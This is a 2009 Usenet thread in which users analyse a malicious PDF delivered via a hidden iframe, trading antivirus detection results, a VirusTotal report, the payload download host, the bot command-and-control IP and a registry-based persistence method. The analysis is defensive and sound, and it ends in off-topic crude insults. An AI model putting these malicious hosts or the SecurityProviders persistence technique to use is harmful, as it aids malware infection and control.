| Microsoft 1.4602/20090430 found [Exploit:Win32/Pdfjsc.gen!A]

| Sunbelt 3.2.1858.2/20090429 found [Exploit.PDF-JS.Gen (v)]
| Symantec 1.4.4.12/20090430 found [Trojan.Pidief.D]

|
| .... Found nothing???

| Thanks.
| George


Thanx George:

Please upload those files to; http://www.uploadmalware.com/
When you upload them, mention this thread, the web site hosting the exploits code, etc.,
and my request to upload them.

GEO

unread,
Apr 30, 2009, 9:26:51 PM4/30/09
to
On Thu, 30 Apr 2009 17:21:24 -0400, "David H. Lipman"
<DLipman~nospam~@Verizon.Net> wrote:


>
>Please upload those files to; http://www.uploadmalware.com/
>When you upload them, mention this thread, the web site hosting the exploits code, etc.,
>and my request to upload them.

Hi David,

Uploaded succesfully. Hopefully I wrote a clear explanation to go
with the files.

The files did finally go through my ISP and I got a reply like the
one I posted early, so the Telus anti-virus did not detect them. They
weren't detected either by the a-virus from my other e-mail address,
which has a very good a-virus.

The IT manager of the web page that was being used as a re-director
using a hidden Iframe did move quickly and has been moved the page to
a different host, and the hidden Iframe has been removed.

Thank you.
George


David H. Lipman

unread,
Apr 30, 2009, 10:02:44 PM4/30/09
to
From: "GEO" <M...@home.here>

| Hi David,

| Uploaded succesfully. Hopefully I wrote a clear explanation to go
| with the files.

| The files did finally go through my ISP and I got a reply like the
| one I posted early, so the Telus anti-virus did not detect them. They
| weren't detected either by the a-virus from my other e-mail address,
| which has a very good a-virus.

| The IT manager of the web page that was being used as a re-director
| using a hidden Iframe did move quickly and has been moved the page to
| a different host, and the hidden Iframe has been removed.

| Thank you.
| George


Got'em thanx.

The payload of the PDF exploit (Luckysploit ?) is
lieliteautobody.cn load.php?id=8

http://www.virustotal.com/analisis/937814e3b10e2f9e312ab2bd91cc386f

a-squared 4.0.0.101 2009.05.01 Trojan-Dropper!IK
AntiVir 7.9.0.160 2009.04.30 TR/Dropper.Gen
DrWeb 4.44.0.09170 2009.05.01 Trojan.Botnetlog.3
eSafe 7.0.17.0 2009.04.30 Win32.TRDropper
Ikarus T3.1.1.49.0 2009.05.01 Trojan-Dropper
McAfee+Artemis 5601 2009.04.30 Artemis!418915B3DA44
McAfee-GW-Edition 6.7.6 2009.04.30 Trojan.Dropper.Gen
Microsoft 1.4602 2009.04.30 Trojan:Win32/Gearclop.gen!A
NOD32 4047 2009.04.30 Win32/TrojanDownloader.Bredolab.AA
Panda 10.0.0.14 2009.04.30 Suspicious file
Prevx1 3.0 2009.05.01 Medium Risk Malware
Sophos 4.41.0 2009.05.01 Mal/UnkPack-Fam
Sunbelt 3.2.1858.2 2009.05.01 Trojan-Win32/Gearclop.gen!A


Creates file:
%System%\digiwet.dll

Which is added to the Security Providers
HKLM\SYSTEM\ControlSet001\Control\SecurityProviders
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
SecurityProviders = "msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll"

It looks like it gets its Bot C&C from; 78.109.29.112

©Ari®

unread,
May 3, 2009, 11:12:33 AM5/3/09
to

It's like getting laid, you'll know it when you get some.

John Smith

unread,
May 3, 2009, 1:20:39 PM5/3/09
to

So....

You're still not getting any are you? LOL

I'm not surprised

Nathan

unread,
May 3, 2009, 3:03:25 PM5/3/09
to

The only thing Franklin J. Camper (alias "Ari") is getting is slapped
around everywhere he goes on Usenet, which is what he deserves.

--
"The chosen course of action, and the duration necessary is of no
consequence."

Spin

unread,
May 4, 2009, 5:51:58 PM5/4/09
to
"Nathan" <nat...@longbow.mil> wrote in message
news:YJSdnY8Jr6PtQWDU...@giganews.com...

Wait...how did you know "Ari" was "Franklin J. Camper"!?? :)

©Ari®

unread,
May 9, 2009, 10:22:23 AM5/9/09
to

Because I said so.

lol

0 new messages